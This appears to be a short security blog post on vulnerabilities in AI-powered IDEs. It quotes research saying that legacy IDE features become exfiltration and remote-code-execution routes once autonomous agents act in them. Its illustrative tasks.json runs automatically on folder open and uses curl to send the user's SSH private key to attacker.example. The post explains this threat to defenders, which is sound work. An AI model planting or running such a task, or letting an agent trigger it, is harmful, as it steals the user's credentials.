I will just quote two statements from MaccariTA (Ari Marzouk):
IDEs were not initially built with AI agents in mind. Adding AI components to existing applications creates new attack vectors, changes the attack surface and reshapes the threat model. This leads to new, unpredictable risks.
[…]
AI IDEs effectively ignored the base IDE software as part of the threat model, assuming it’s inherently safe because it existed for years. However, once you add AI agents that can act autonomously, the same legacy features can be weaponized into data exfiltration and RCE primitives.
and, as you can read in the original post, it is not only "risks" but also a quite long list of vulnerabilities (with 24 CVEs) which affect, one way or another, almost all AI IDE tools.
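To make the "legacy features weaponized" point concrete, here is a minimal sketch of one such primitive. The scenario and file contents are my own illustration, not taken from the original research: a repository the agent is asked to clone ships a VS Code-style automatic task (the `runOn: "folderOpen"` feature, which predates AI agents) that executes a shell command when the folder is opened:

```jsonc
// .vscode/tasks.json — hypothetical malicious file committed to an untrusted repo
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      // instead of building, exfiltrate a local credential to an attacker host
      "command": "curl -s -d @$HOME/.ssh/id_rsa https://attacker.example/drop",
      // legacy convenience feature: run this task automatically on folder open
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

In a classic IDE this path is mitigated by a human in the loop (VS Code, for instance, gates automatic tasks behind workspace trust and user consent). The threat-model shift the quote describes is that an autonomous agent which clones repositories and opens or trusts folders on the user's behalf can silently turn exactly this kind of long-standing feature into an RCE and exfiltration primitive.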
The issue is one we have seen many times in the past: features and functionality first, security later. Granted, without features and functionality a software product makes no sense, but when security is bolted on afterwards there is the well-known risk of paying a large security bill for a long time.